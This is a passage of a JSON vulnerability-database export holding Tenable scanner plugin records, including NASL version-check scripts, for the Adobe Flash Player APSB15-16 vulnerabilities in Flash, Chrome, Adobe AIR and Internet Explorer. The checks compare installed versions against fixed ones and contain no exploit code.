Vulnerabilities (APSB15-16) (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB15-16.NASL", "href": "https://www.tenable.com/plugins/nessus/84644", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84644);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Flash Player <= 18.0.0.194 Multiple Vulnerabilities (APSB15-16) (Mac OS X)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to version 18.0.0.194. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 18.0.0.203 or later.\n\nAlternatively, Adobe has made version 13.0.0.302 available for those\ninstallations that cannot be upgraded to 18.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (ver_compare(ver:version, fix:\"14.0.0.0\", strict:FALSE) >= 0)\n{\n cutoff_version = \"18.0.0.194\";\n fix = \"18.0.0.203\";\n}\nelse\n{\n cutoff_version = \"13.0.0.296\";\n fix = \"13.0.0.302\";\n}\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:44:23", "description": "The version of Google Chrome on the remote host is prior to 43.0.2357.132 and is affected by the following vulnerabilities in the Adobe Flash player component :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097) \n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118) \n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431) \n - Multiple NULL pointer dereference flaws exist. (CVE-2015-3126, CVE-2015-4429) \n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114) \n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433) \n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119) \n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116) \n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)", "cvss3": {"score": null, "vector": null}, "published": "2015-09-25T00:00:00", "type": "nessus", "title": "Google Chrome < 43.0.2357.132 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5124", "CVE-2015-3097"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "8881.PASL", "href": "https://www.tenable.com/plugins/nnm/8881", "sourceData": "Binary data 8881.pasl", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:44:56", "description": "Versions of Adobe Flash Player prior to 18.0.0.203 are outdated and thus unpatched for the following vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n - Multiple NULL pointer dereference flaws exist. (CVE-2015-3126, CVE-2015-4429)\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-07-24T00:00:00", "type": "nessus", "title": "Flash Player < 13.0.0.302 / 18.0.0.203 Multiple Vulnerabilities (APSB15-16)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5124", "CVE-2015-3097"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:adobe:flash_player:*:*:*:*:*:*:*:*"], "id": "8821.PRM", "href": "https://www.tenable.com/plugins/nnm/8821", "sourceData": "Binary data 8821.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:01:06", "description": "According to its version, the installation of Adobe AIR on the remote Windows host is equal or prior to 18.0.0.144. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "Adobe AIR <= 18.0.0.144 Multiple Vulnerabilities (APSB15-16)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB15-16.NASL", "href": "https://www.tenable.com/plugins/nessus/84641", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84641);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe AIR <= 18.0.0.144 Multiple Vulnerabilities (APSB15-16)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 18.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 18.0.0.180 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '18.0.0.144';\nfix = '18.0.0.180';\nfix_ui = '18.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:18:58", "description": "The remote Windows host is missing KB3065823. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "MS KB3065823: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB3065823.NASL", "href": "https://www.tenable.com/plugins/nessus/84645", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84645);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"MSKB\", value:\"3065823\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"MS KB3065823: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing KB3065823. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/3065823/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft 